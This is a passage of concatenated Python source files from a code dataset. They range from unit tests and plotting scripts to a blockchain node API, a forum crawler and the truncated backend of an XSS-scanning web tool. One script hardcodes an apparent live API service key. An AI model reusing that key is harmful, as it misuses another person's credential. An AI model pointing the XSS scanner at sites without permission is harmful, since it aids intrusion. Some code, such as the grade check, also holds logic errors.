3.0, \r\n total_amount = 3.0, \r\n frequent_renter_points = 1)\r\n self.assertEqual(statement, self.pedro.statement()) \r\n\r\n def statement(self, movie, this_amount, total_amount, frequent_renter_points):\r\n result = \"Учет аренды для \" + self.pedro.get_name() + \"\\n\" \\\r\n + \"\\t\" + movie.get_title() + \"\\t\" + str(this_amount) + \"\\n\" \\\r\n + \"Сумма задолженности составляет \" + str(total_amount) + \"\\n\" \\\r\n + \"Вы заработали \" + str(frequent_renter_points) + \" очков за активность\"\r\n return result\r\n\r\n\r\nif __name__ == \"__main__\": unittest.main()","sub_path":"rental/step_1/TestCustomer.py","file_name":"TestCustomer.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"149223303","text":"#Data processing - converting the raw csv into an array\n#this uses the github dataset\n\nimport csv, random\nimport matplotlib.pyplot as plt\n\nvals = []\nmaxvals = []\n\n\ndef importData():\n size = 1368\n #1367 is the label\n #numerical data ends at 1366\n #not bringing in booleans rn\n global vals\n with open('data.csv') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n for row in readCSV:\n curr = [0 for i in range (size)]\n for col in range (size):\n curr[col] = row[col]\n vals.append(curr)\n #this is important for formatting\n vals[0][0] = vals[0][0][3:]\n #have to get in floats cause really small numbers break it\n for i in range(0, len(vals)):\n for j in range(0, len(vals[0])-1):\n if float(vals[i][j])< 0.01:\n vals[i][j] = float(vals[i][j])\n #process\n for i in range (len(vals)):\n temp = vals[i][1367]\n valid = temp.find('Normal')\n #if normal is not found, set label to -1 , it has tumour\n if valid == -1:\n vals[i][1367] = -1\n #if normal is found, set label to 1, it doesn't have tumour\n else:\n vals[i][1367] = 1\n #scramble so same stuff isn't all together\n #random.shuffle(vals)\n for i in range(len(vals)):\n maxvals.append(max(vals[i]))\n \n tsum = 0\n for i in range(0,237):\n tsum += float(maxvals[i])\n print(float(tsum/237), ' - cancer') #slightly higher - 0.732\n tsum = 0 \n for i in range(237, len(maxvals)):\n tsum += float(maxvals[i])\n print(float(tsum/88),' - non') #slightly lower - 0.726\n\n\n\ndef printData():\n global vals\n #printing label\n for i in range(len(vals)):\n print (maxvals[i], ' - ' , vals[i][1367])\n\ndef draw():\n #this plots stuff. big spike around 1k\n global vals\n temparray = []\n for j in range(235,236): \n for i in range(0,1366):\n temparray.append(float(vals[j][i]))\n plt.plot(temparray)\n \n plt.show()\n\n#mainline\nprint ('run')\nimportData()\ndraw()\nprint ('done')","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"447214122","text":"'''Crie um programa que leia duas notas de aluno e calcule sua média.\r\nMédia abaixo de 5: reprovado\r\nmédia entre 5 e 6.9: recuperação\r\nmédia maior que 7: aprovado.'''\r\n#informações:\r\nn1 = float(input('Informe a primeira nota: '))\r\nn2 = float(input('Informe a segunda nota: '))\r\n\r\n#calculos:\r\nmedia = (n1 + n2) / 2\r\n\r\n#programa:\r\nif media < 5:\r\n print('A média do aluno é {:.2f}, portanto o aluno está REPROVADO!'.format(media))\r\nelif 7 < media >= 5:\r\n print('A média do aluno é {:.2f}, portanto o aluno está em RECUPERAÇÃO!'.format(media))\r\nelif media >= 7:\r\n print('A média do alino é {:.2f}, portanto o aluno está APROVADO!'.format(media))\r\n","sub_path":"Desafio40.py","file_name":"Desafio40.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"8671485","text":"import requests\nfrom flask import Flask, jsonify, request, render_template\n#from flask_cors import CORS\nimport sys\nimport json\n\nimport node\nimport wallet\nimport transaction\nimport wallet\n\n\n### JUST A BASIC EXAMPLE OF A REST API WITH FLASK\n\n\n\napp = Flask(__name__)\n#CORS(app)\n# user should provide rest api's ports\nif(len(sys.argv)==1):\n print(\"Usage is python3 rest.py is_it_bootstrap? how_many_children? myPort ip_bootstrap myIP !\")\n sys.exit(0)\n\nif len(sys.argv) != 6:\n print(\"Usage is python3 rest.py is_it_bootstrap? how_many_children? myPort ip_bootstrap myIP !\")\n sys.exit(0)\n\n# orismata os exis : bootstrap? | arithmos_paidion | port pou trexeis | ip_bootstrap | ip_dikia_sou\nstart = node.node(sys.argv[1], int(sys.argv[2]),sys.argv[3], sys.argv[4], sys.argv[5])\n\n#.......................................................................................\n\n@app.route('/show_balance', methods=['GET'])\ndef get_bal():\n bal = start.wallet.mybalance()\n response = {\n 'Balance': bal\n }\n return jsonify(response), 200\n\n@app.route('/view_transactions', methods=['GET'])\ndef get_trans():\n\n last_transactions = start.chain.list[-1].listOfTransactions\n # edo kati einai lathos\n response = {\n 'reply': last_transactions,\n 'List of transactions in the last verified block': last_transactions\n }\n return jsonify(response), 200\n\n@app.route('/create_transaction', methods=['POST'])\ndef create():\n data = request.get_json()\n addr = data['addr']\n #print (\"Address is\",addr)\n amount = data['amount']\n #print(\"Amount is\",amount)\n #current balance\n bal = start.wallet.mybalance()\n if (not addr.isnumeric() or int(addr) < 0 or int(addr) > start.nei):\n response = {\n 'message': \"Please provide a number between 0 and \" + str(start.nei) + \" as address.\"\n }\n elif (int(addr) == start.id):\n response = {\n 'message': \"You cannot make a transaction with yourself...\"\n }\n elif (not amount.isnumeric() or int(amount) <= 0):\n response = {\n 'message': \"Please provide a positive number as amount.\"\n }\n elif int(amount) > bal:\n response = {\n #'message': \"Ena pitsiriki, einai mpatiraki...\",\n 'CLICK HERE': \"https://www.youtube.com/watch?v=TeT0vNbjs5w\"\n }\n else:\n # stall transaction till mining is done\n if not node.no_mine.isSet():\n node.no_mine.wait()\n\n sender = start.public_key_list[start.id]\n receiver = start.public_key_list[int(addr)]\n start.create_transaction(sender,receiver,int(amount))\n\n response = {\n 'message': \"Create transaction works !\"\n }\n return jsonify(response), 200\n\n@app.route('/nodes/mined_block', methods = ['POST'])\ndef node_found():\n values = request.get_json()\n last_block = values['last_block'] # isos to pairnei lathoss\n print(\"Last block of miner\", last_block)\n if start.verify_and_add_block(last_block):\n node.no_mine.set()\n response = {\n 'message' : 'BLOCK ADDED TO BLOCKCHAIN'\n }\n return jsonify(response), 201\n else:\n response = {\n 'message' : 'BLOCK VERIFICATION FAILED'\n }\n return jsonify(response), 400\n\n\n\n@app.route('/nodes/register', methods = ['POST'])\ndef register():\n\n \"\"\"\n myid = request.form['id']\n ring = request.form.getlist('ring')\n keys = request.form.getlist('public_key_list')\n gen_index = request.form['gen_index']\n gen_timestamp = request.form['gen_timestamp']\n gen_transactions = request.form.getlist('gen_transactions')\n gen_nonce = request.form['gen_nonce']\n gen_previousHash = request.form['gen_previous_hash']\n \"\"\"\n data = request.get_json()\n myid = data['id']\n ring = data['ring']\n keys = data['public_key_list']\n genesis = data['genesis']\n\n #print(\"genesis\", genesis)\n #print(\"myid\",myid)\n #print(\"gen_timestamp\",gen_timestamp)\n #print(\"gen_transactions\",gen_transactions)\n #print(\"gen_nonce\",gen_nonce)\n #print(\"gen_previousHash\",gen_previousHash)\n if myid is None:\n return \"Error:No valid myid\",400\n if ring is None:\n return \"Error:No valid ring\",400\n if keys is None:\n return \"Error:No valid public keys\",400\n start.recieve(myid, ring,keys,genesis)\n response = {'message': 'ok'}\n return jsonify(response), 200\n\n@app.route('/nodes/reg_dad', methods = ['POST'])\ndef reg():\n\n a = request.form['address']\n mykey = request.form['public_key']\n if a is None:\n return \"Error:No valid address\",400\n #print(a)\n #print(mykey)\n start.reg_a_node(a,mykey)\n response = {'message': 'ok'}\n return jsonify(response), 200\n\n@app.route('/transactions/new', methods = ['POST'])\ndef new_tran():\n \"\"\"\n sender = request.form['sender_adress']\n receiver = request.form['receiver']\n value = request.form['value']\n myid = request.form['myid']\n in_list = request.form.getlist('inputs')\n out_list = request.form['outputs']\n sign = request.form['sign']\n \"\"\"\n data = request.get_json()\n sender = data['sender']\n receiver = data['receiver']\n value = data['value']\n myid = data['myid']\n in_list = data['inputs']\n out_list = data['outputs']\n sign =data['sign']\n\n # NOT SURE IF NEEDED\n if not node.no_mine.isSet():\n node.no_mine.wait()\n\n start.receive_trans(sender,receiver,value,myid,in_list,out_list,sign)\n\n print(\"BALANCE\",start.wallet.mybalance())\n response = {'message': 'ok'}\n return jsonify(response), 200\n\nif __name__ == '__main__':\n app.run(host=sys.argv[5], port = int(sys.argv[3]))\n","sub_path":"src/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":5673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"360391811","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 20 17:54:38 2020\n\n@author: keti\n\"\"\"\n\n\nimport requests\nimport pandas as pd\n\ndef get_request_query(url, operation, params, serviceKey):\n import urllib.parse as urlparse\n params = urlparse.urlencode(params)\n request_query = url + '/' + operation + '?' + params + '&' + 'serviceKey' + '=' + serviceKey+'&_type=json'\n return request_query\n\n# 요청 URL과 오퍼레이션\nURL = 'http://apis.data.go.kr/B090041/openapi/service/SpcdeInfoService'\nOPERATION = 'getRestDeInfo' # 국경일 + 공휴일 정보 조회 오퍼레이션\nSERVICEKEY = 'f0zYRYA98oJ0kjZpHkrHyzOMbBXmY7Iwev8c8n35kw%2FFlpgBHtsVTb6aD%2BKIPUgo3g2BAUisHDuSDNF7wLaZ%2Bg%3D%3D'# 파라미터\nPARAMS = {'solYear':'2017', 'solMonth':'01'}\n\nholiday=pd.DataFrame(columns=['dateKind', 'dateName', 'isHoliday', 'locdate', 'seq'])\n\nfor year in range(2017,2021):\n print(year)\n for month in range(1,13):\n if month<10:\n PARAMS = {'solYear':str(year), 'solMonth': '0'+str(month)}\n print(PARAMS)\n else:\n PARAMS = {'solYear':str(year), 'solMonth': str(month)}\n print(PARAMS)\n request_query = get_request_query(URL, OPERATION, PARAMS, SERVICEKEY)\n html= requests.get(request_query)\n dictr=html.json().get('response').get('body').get('items')\n\n if dictr != '':\n recs = dictr['item']\n from pandas.io.json import json_normalize\n df = json_normalize(recs)\n holiday=pd.concat([holiday, df], axis=0)\n\ndel(year, month, dictr, recs, df, request_query)\n\nholiday=holiday.assign(date= pd.to_datetime(holiday['locdate'].astype(str)).dt.date).drop(['dateKind', 'isHoliday','locdate','seq' ], axis=1)\n\n","sub_path":"Timeseries/Hands6/holiday_api.py","file_name":"holiday_api.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"325954941","text":"# PROJECT : kungfucms\n# TIME : 2019/7/21 10:16\n# AUTHOR : Younger Shen\n# EMAIL : younger.x.shen@gmail.com\n# CELL : 13811754531\n# WECHAT : 13811754531\n# https://github.com/youngershen/\n\nimport os\nimport shutil\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.utils.translation import ugettext as _\nfrom django.core import management\nfrom django.core.management.commands import startapp\n\n\nclass Command(BaseCommand):\n template_path = os.path.join(settings.BASE_DIR, 'kungfucms', 'utils', 'conf', 'app_template')\n default_path = os.path.join(settings.BASE_DIR, 'kungfucms', 'apps')\n help = _('创建APP')\n\n def add_arguments(self, parser):\n parser.add_argument('name',\n help=_('APP 的名称'))\n\n parser.add_argument('-p',\n '--path',\n nargs='?',\n const=self.default_path,\n default=self.default_path,\n help=_('APP 的路径'))\n\n parser.add_argument('-f',\n '--force',\n action='store_true',\n help=_('覆盖已存在的同名 APP'))\n\n def handle(self, *args, **options):\n name = options['name']\n path = os.path.join(options['path'], name)\n\n if not os.path.exists(path):\n os.mkdir(path)\n self.create_app(name, path)\n\n elif options['force']:\n shutil.rmtree(path)\n os.mkdir(path)\n self.create_app(name, path)\n\n else:\n raise CommandError(_('{APP_NAME} APP 已存在').format(APP_NAME=name))\n\n def create_app(self, name, path):\n management.call_command(startapp.Command(),\n name,\n path,\n '--template={PATH}'.format(PATH=self.template_path))","sub_path":"kungfucms/apps/core/management/commands/newapp.py","file_name":"newapp.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"196107308","text":"import tensorflow as tf\nimport numpy as np\n\ndef calc_shift(x1, x2, cx, k):\n \n x1 = tf.cast(x1, dtype = tf.float32)\n x2 = tf.cast(x2, dtype = tf.float32)\n x3 = tf.cast(0, dtype = tf.float32)\n \n cx = tf.cast(cx, dtype = tf.float32)\n k = tf.cast(k, dtype = tf.float32)\n res1 = tf.cast(0, dtype = tf.float32)\n res3 = tf.cast(0, dtype = tf.float32)\n \n def calc(x1, x2, x3, cx, k, res1, res3):\n x1, x2 = tf.cond( res3 < 0, lambda : (x3, x2), lambda : (x1, x3) )\n\n x3 = x1 + (x2 - x1) * 0.5\n res1 = x1 + ((x1 - cx) * k * ((x1 - cx) * (x1 - cx)))\n res3 = x3 + ((x3 - cx) * k * ((x3 - cx) * (x3 - cx)))\n\n return x1, x2, x3, cx, k, res1, res3\n\n def check(x1, x2, x3, cx, k, res1, res3):\n thresh = 1.0\n conv = tf.logical_and( tf.greater(-thresh, res1), tf.less(res1, thresh) )\n return conv\n\n x1, x2, x3, cx, k, res1, res3 = tf.while_loop(check, calc, loop_vars = [x1, x2, x3, cx, k, res1, res3])\n\n return x1\n\n\ndef getRadialXY(x, y, cx, cy, k, k1, k2, sc, props):\n\n def scale(x, y, cx, cy, k, k1, k2, sc, props):\n xshift = props[0]\n yshift = props[1]\n xscale = props[2]\n yscale = props[3]\n\n x = tf.cast(x, dtype = tf.float32)\n x = x * xscale + xshift\n y = tf.cast(y, dtype = tf.float32)\n y = y * yscale + yshift\n r = tf.pow((x - cx), 2) + tf.pow((y - cy), 2)\n y = (y + k * ((y - cy) * r) + k1 * ((y - cy) * tf.pow(r, 2)) + k2 * ((y - cy) * tf.pow(r, 3)))\n x = (x + k * ((x - cx) * r) + k1 * ((x - cx) * tf.pow(r, 2)) + k2 * ((x - cx) * tf.pow(r, 3)))\n return y, x\n\n def not_scale(x, y, cx, cy, k, k1, k2, sc, props):\n x = tf.cast(x, dtype = tf.float32)\n y = tf.cast(y, dtype = tf.float32)\n r = tf.pow((x - cx), 2.0) + tf.pow((y - cy), 2.0)\n y = (y + k * ((y - cy) * r) + k1 * ((y - cy) * tf.pow(r, 2)) + k2 * ((y - cy) * tf.pow(r, 3)))\n x = (x + k * ((x - cx) * r) + k1 * ((x - cx) * tf.pow(r, 2)) + k2 * ((x - cx) * tf.pow(r, 3)))\n return y, x\n\n y, x = tf.cond(sc, lambda : scale(x, y, cx, cy, k, k1, k2, sc, props), lambda : not_scale(x, y, cx, cy, k, k1, k2, sc, props))\n return y, x\n\n\ndef fisheye(img, Cx, Cy, k, k1, k2, scale):\n\n Cx = tf.Print(Cx, [Cx, 'Cx'])\n scale = tf.constant(scale, dtype = tf.bool)\n scale = tf.Print(scale, [scale, 'scale'])\n\n shape = tf.shape(img)\n shape = tf.Print(shape, [shape, 'shape'])\n\n xshift = calc_shift(0, Cx - 1, Cx, k)\n xshift = tf.Print(xshift, [xshift, 'xshift'])\n\n w = tf.cast(shape[0], dtype = tf.float32)\n h = tf.cast(shape[1], dtype = tf.float32)\n w = tf.Print(w, [w, 'w'])\n h = tf.Print(h, [h, 'h'])\n \n newcenterx = w - Cx\n newcenterx = tf.Print(newcenterx, [newcenterx, 'newcenterx'])\n\n xshift2 = calc_shift(0, newcenterx - 1, newcenterx, k)\n xshift2 = tf.Print(xshift2, [xshift2, 'xshift2'])\n yshift = calc_shift(0, Cy - 1, Cy, k)\n yshift = tf.Print(yshift, [yshift, 'yshift'])\n newcentery = w - Cy\n newcentery = tf.Print(newcentery, [newcentery, 'newcentery'])\n yshift2 = calc_shift(0, newcentery - 1, newcentery, k)\n yshift2 = tf.Print(yshift2, [yshift2, 'yshift2'])\n xscale = (w - xshift - xshift2) / w\n yscale = (h - yshift - yshift2) / h\n xscale = tf.Print(xscale, [xscale, 'xscale'])\n yscale = tf.Print(yscale, [yscale, 'yscale'])\n\n props = tf.stack([xshift, yshift, xscale, yscale])\n props = tf.Print(props, [props, 'props'])\n\n y = tf.constant(1, dtype = tf.int32)\n x = tf.constant(1, dtype = tf.int32)\n\n new_y, new_x = getRadialXY(0, 0, Cx, Cy, k, k1, k2, scale, props)\n map_xy = tf.stack([new_y, new_x])\n map_xy = tf.reshape(map_xy, shape = (1, 2))\n\n def create_map(x, y, map_xy, Cx = Cx, Cy = Cy, k = k, k1 = k1, k2 = k2, scale = scale, props = props, h = tf.cast(h, dtype = tf.int32)):\n new_y, new_x = getRadialXY(x, y, Cx, Cy, k, k1, k2, scale, props)\n map_xy = tf.concat([map_xy, [[new_y, new_x]]], axis = 0)\n\n y = y + 1\n x = tf.cond(tf.greater_equal(y, h), lambda : tf.add(x, 1), lambda : x)\n y = tf.cond(tf.greater_equal(y, h), lambda : tf.constant(0), lambda : y)\n x = tf.Print(x, [x, 'loop_x'])\n y = tf.Print(y, [y, 'loop_y'])\n\n return x, y, map_xy\n \n def check(x, y, map_xy):\n cond = tf.logical_and(tf.less(tf.cast(y, dtype = tf.float32), h), tf.less(tf.cast(x, dtype = tf.float32), w))\n return cond\n\n x, y, map_xy = tf.while_loop(cond = check, body = create_map, loop_vars = [x, y, map_xy], \\\n shape_invariants = [x.get_shape(), y.get_shape(), tf.TensorShape([None, None])], parallel_iterations = 1000,\n back_prop = False, swap_memory = False)\n\n print(map_xy)\n return map_xy\n\ndef get_fisheyed(img, focal_len = 800):\n \n with tf.device('/cpu:0'):\n # parametrs\n f = tf.constant(focal_len, dtype = tf.float32) # focal'ish\n # magic constants\n f = tf.Print(f, [f, 'f'])\n k = 0.5 * tf.pow(10.0, -2.0) / f\n k1 = k * tf.pow(10.0, -9.0)\n k2 = k1\n k = tf.Print(k, [k, 'k'])\n\n sz = tf.shape(img)\n sz = tf.Print(sz, [sz, 'image shape'])\n Cx = tf.cast(tf.divide(sz[0], 2), dtype = tf.float32)\n Cx = tf.Print(Cx, [Cx, 'Cx'])\n Cy = tf.cast(tf.divide(sz[1], 2), dtype = tf.float32)\n Cy = tf.Print(Cy, [Cy, 'Cy'])\n\n fisheyed = fisheye(img, Cx, Cy, k, k1, k2, True)\n\n return fisheyed\n\n\nif __name__ == '__main__':\n\n # test zoom\n filenames = ['/home/undead/Pictures/MVI_2780 11.jpg']\n filename_queue = tf.train.string_input_producer(filenames)\n\n reader = tf.WholeFileReader()\n key, value = reader.read(filename_queue)\n\n images = tf.image.decode_jpeg(value, channels = 3)\n\n init_op = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init_op)\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n print('inited')\n #print('images:', sess.run(images).shape)\n mapxy = get_fisheyed(images)\n print(sess.run(mapxy))","sub_path":"generate_zooms.py","file_name":"generate_zooms.py","file_ext":"py","file_size_in_byte":6123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"552254790","text":"from jsonutil import json_load_byteified as json_loads_file\n\ndef sumnested(target, source):\n\tn = dict(target)\n\tfor k in source:\n\t\tvalue = 0\n\t\tif isinstance(source[k], dict):\n\t\t\tvalue = sumnested(n.get(k, dict()), source[k])\n\t\t\n\t\telse:\n\t\t\tvalue = source[k] + n.get(k, 0)\n\n\t\tn[k] = value\n\n\treturn n\n\ndef compile_software(data):\n\t## Sort the data based on software\n\tdata = sorted(data, key=lambda x: x[1])\n\tcompiledata = dict()\n\t\n\tfor hour, software, device, fpath in data:\n\t\tif software not in compiledata:\n\t\t\tcompiledata[software] = {\n\t\t\t\t\"mintime\": None,\n\t\t\t\t\"maxtime\": None,\n\t\t\t\t\"unique_devices\": set(),\n\t\t\t\t\"data\": dict()\n\t\t\t}\n\n\n\t\tif hour < compiledata[software][\"mintime\"] or compiledata[software][\"mintime\"] == None:\n\t\t\tcompiledata[software][\"mintime\"] = hour\n\n\t\tif hour > compiledata[software][\"maxtime\"] or compiledata[software][\"maxtime\"] == None:\n\t\t\tcompiledata[software][\"maxtime\"] = hour\n\n\t\tcompiledata[software][\"unique_devices\"].add(device)\n\n\t\twith open(fpath, \"r\") as infile:\n\t\t\tprops = json_loads_file(infile)\n\t\t\tcompiledata[software][\"data\"] = sumnested(compiledata[software][\"data\"], props)\n\n\treturn compiledata\n\ndef compile_device(data):\n\tdata = sorted(data, key=lambda x: x[2])\n\tcompiledata = dict()\n\n\tfor hour, software, device, fpath in data:\n\t\tif device not in compiledata:\n\t\t\tcompiledata[device] = {\n\t\t\t\t\"mintime\": None,\n\t\t\t\t\"maxtime\": None,\n\t\t\t\t\"unique_softwares\": set(),\n\t\t\t\t\"data\": dict()\n\t\t\t}\n\n\t\tif hour < compiledata[device][\"mintime\"] or compiledata[device][\"mintime\"] == None:\n\t\t\tcompiledata[device][\"mintime\"] = hour\n\n\t\tif hour > compiledata[device][\"maxtime\"] or compiledata[device][\"maxtime\"] == None:\n\t\t\tcompiledata[device][\"maxtime\"] = hour\n\n\t\tcompiledata[device][\"unique_softwares\"].add(software)\n\n\t\twith open(fpath, \"r\") as infile:\n\t\t\tprops = json_loads_file(infile)\n\t\t\tcompiledata[device][\"data\"] = sumnested(compiledata[device][\"data\"], props)\n\n\treturn compiledata","sub_path":"data_compiler.py","file_name":"data_compiler.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"430341788","text":"\"\"\"Contains settings for the admin page.\"\"\"\n\nfrom django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom .models import Game, Player, User\n\n\n@admin.register(Game)\nclass GameAdmin(admin.ModelAdmin):\n \"\"\"Settings for Game model on admin page.\"\"\"\n\n list_display = (\n \"datetime_played\",\n \"winner\",\n \"loser\",\n \"winner_score\",\n \"loser_score\",\n )\n\n\n@admin.register(Player)\nclass PlayerAdmin(admin.ModelAdmin):\n \"\"\"Settings for Player model on admin page.\"\"\"\n\n list_display = (\"name\",)\n\n\n# Register custom user model\nadmin.site.register(User, UserAdmin)\n","sub_path":"backend/api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"165387485","text":"#coding:utf-8\r\nimport sys, os\r\n\r\nimport gevent\r\nfrom gevent import monkey, pool; monkey.patch_all()\r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\nimport re\r\n\r\nimport pymysql.cursors\r\nimport redis\r\nfrom datetime import datetime\r\n\r\nimport timeit\r\nimport requests\r\nimport gc\r\nimport traceback\r\n\r\n# 导入当前文件夹下的refactor.py\r\nsys.path.append(os.getcwd())\r\nimport refactor as ref\r\nimport config as conf\r\n\r\ndef Main():\r\n\r\n # 从第一页开始爬\r\n pageNum = 1\r\n\r\n ses = ref.Login()\r\n p = pool.Pool(20)\r\n jobs = [p.spawn(CrawlPage, ses, threadid, pageNum) for threadid in range(conf.tid_range['start'],conf.tid_range['end'],conf.tid_range['step'])]\r\n gevent.joinall(jobs, 60)\r\n # CrawlPage(ses, 1876842, pageNum)\r\n\r\n\r\ndef CrawlPage(ses, threadid, pageNum):\r\n ref.FramePrint('tid %d page %d start at: %s' %\r\n (threadid, pageNum, datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\r\n\r\n cache = redis.StrictRedis(conf.redis['server'], conf.redis['port'])\r\n\r\n try:\r\n tsoup = Browser(ses, threadid, pageNum)\r\n except:\r\n # 出错将该页push 到 error队列\r\n key = 'error'\r\n value = {'threadid': threadid,\r\n 'pageNum': pageNum}\r\n cache.lpush(key, value)\r\n ref.FramePrint('this tid %d error! page %d' % (threadid, pageNum))\r\n traceback.print_exc()\r\n else:\r\n # 成功完成将该页push到page列表等待后续的parseHtml等工序\r\n key = 'page'\r\n value = {'threadid': threadid,\r\n 'pageNum': pageNum,\r\n 'tsoup': tsoup}\r\n cache.lpush(key, value)\r\n\r\n ref.FramePrint('tid %d page %d end at: %s'\r\n % (threadid,\r\n pageNum,\r\n datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\r\n del cache\r\n\r\n\r\n\r\ndef Browser(ses, threadid, pageNum):\r\n\r\n link = 'https://www.hi-pda.com/forum/viewthread.php?tid=%s&page=%s' % (str(threadid),str(pageNum))\r\n\r\n headers = {\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Connection': 'keep-alive',\r\n 'User-Agent': \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0\",\r\n 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',\r\n 'Accept-Encoding': 'gzip, deflate, br'\r\n }\r\n\r\n resp = ses.get(link, headers=headers)\r\n tsoup = resp.content\r\n\r\n del resp\r\n\r\n return tsoup\r\n\r\n\r\nif __name__ == '__main__':\r\n Main()\r\n","sub_path":"networkOnly.py","file_name":"networkOnly.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"107233458","text":"from core import *\nfrom urllib.parse import urlparse\nfrom urllib.error import URLError, HTTPError\nfrom flask import Flask,request,render_template,url_for,redirect,g,session,url_for\nimport sqlite3\nimport hashlib\nimport json\nimport os\n\napp = Flask(__name__, static_url_path=\"/static/\", static_folder=\"./templates/static/\")\nUSER_DATABASE = 'users.db'\nREPORT_DATABASE = 'report.db'\napp.secret_key = os.urandom(24)\n\ndef vaild_url(url):\n\n\turl_scheme = urlparse(url).scheme\n\turl_domain = urlparse(url).netloc\n\n\tif(url_scheme == ''):\n\t\n\t\treturn False\n\n\tif(url_domain == ''):\n\t\n\t\treturn False\n\t\n\tif(url_scheme == 'http' or url_scheme == 'https'):\n\n\t\tif(url_domain == 'localhost' or url_domain == '127.0.0.1'):\n\n\t\t\treturn False\n\t\telse:\n\t\t\treturn url\n\ndef load_userdb():\n\n\tif not hasattr(g, 'users.db'):\n\t\n\t\tdb = sqlite3.connect(USER_DATABASE)\n\t\n\tdb.row_factory = sqlite3.Row\n\treturn db\n\ndef load_reportdb():\n\n\tif not hasattr(g, 'report.db'):\n\n\t\tdb = sqlite3.connect(REPORT_DATABASE)\n\n\tdb.row_factory = sqlite3.Row\n\treturn db\n\n@app.teardown_appcontext\ndef close_connection(exception):\n\n\tif hasattr(g, 'users.db'):\n\n\t\tg.db.close()\n\n\n@app.route('/', methods=[\"GET\",\"POST\"])\ndef index():\n\n return render_template('index.html')\n\n@app.route('/api/logout', methods=[\"GET\"])\ndef logout():\n\n\tif session.get('user') == None:\n\n\t\treturn json.dumps({'success':\"false\", \"msg\":\"You are not logged\"})\n\n\tsession.pop('user', None)\n\treturn json.dumps({\"success\":\"true\", \"msg\":\"Logout Success\"})\n\n\n@app.route('/api/login', methods=[\"POST\"])\ndef login():\n\n\tif session.get('user') != None:\n\n\t\treturn json.dumps({'success':\"false\",\"msg\":\"You are already logged\"})\n\n\tusername = request.form.get('username')\n\tpassword = request.form.get('password')\n\n\tdb = load_userdb()\n\tcursor = db.cursor()\n\tquery = cursor.execute(\"SELECT username FROM users where username = ? AND password = ?\", (username, hashlib.sha256(password.encode()).hexdigest())).fetchone()\n\n\tif query:\n\t\n\t\tsession['user'] = query['username']\n\t\treturn json.dumps({\"success\":\"true\",\"msg\":\"Login Success\"});\n\n\telse:\n\n\t\treturn json.dumps({\"success\":\"false\",\"msg\":\"Login Fail\"});\n\n\n@app.route('/api/register', methods=[\"POST\"])\ndef register():\n\n\tif session.get('user') != None:\n\n\t\treturn json.dumps({'success':\"false\",\"msg\":\"You are already logged\"})\n\n\tusername = request.form.get('username')\n\tpassword = request.form.get('password')\n\n\tdb = load_userdb()\n\tcursor = db.cursor()\n\tquery = cursor.execute(\"SELECT * FROM users where username = ?\", (username,)).fetchone()\n\n\tif query:\n\n\t\treturn json.dumps({\"success\":\"false\", \"msg\": \"User already exist\"});\n\n\n\tquery2 = \"INSERT INTO users(username, password) VALUES (?,?)\"\n\tquery_exec = cursor.execute(query2, (username, hashlib.sha256(password.encode()).hexdigest()))\n\tdb.commit()\n\n\tif not query_exec:\n\t\n\t\treturn json.dumps({\"success\":\"false\",\"msg\":\"DB Error\"});\n\t\n\treturn json.dumps({\"success\":\"true\", \"msg\":\"Register Success\"});\n\n@app.route('/api/search', methods=[\"POST\"])\ndef search():\n \n\tif session.get('user') == None:\n\n\t\treturn json.dumps({'success':\"false\",\"msg\":\"You are not logged\"})\n\t\n\turl = request.form.get('url')\n\tuse_cookie = request.form.get('use_cookie')\n\n\tcheck_url = vaild_url(url)\n\n\tif(check_url == False):\n\n\t\treturn json.dumps({\"success\":\"false\", \"msg\": \"Invaild URL\"})\n\n\tif(use_cookie == 'true'):\n\n\t\tcookie = request.form.get('cookie')\n\t\tparser = XSsearch(url=url,cookies=cookie)\n\t\tparser.run()\n\t\tresult = parser.result\n\t\treturn json.dumps(result)\n\n\telse:\n\n\t\tparser = XSsearch(url=url,cookies={})\n\t\tparser.run()\n\t\tresult = parser.result\n\t\treturn json.dumps(result)\n\n\n@app.route('/api/status', methods=[\"GET\"])\ndef status():\n\n\tlogined = True if session.get('user') else False\n\treturn json.dumps({\"success\":logined, \"msg\":\"Logged\"})\n\t\n\n@app.route('/api/report', methods=[\"POST\"])\ndef report():\n\n\tif session.get('user') == None:\n \n\t\treturn json.dumps({'success':\"false\",\"msg\":\"You arg not logged\"})\n\t\n\turl = 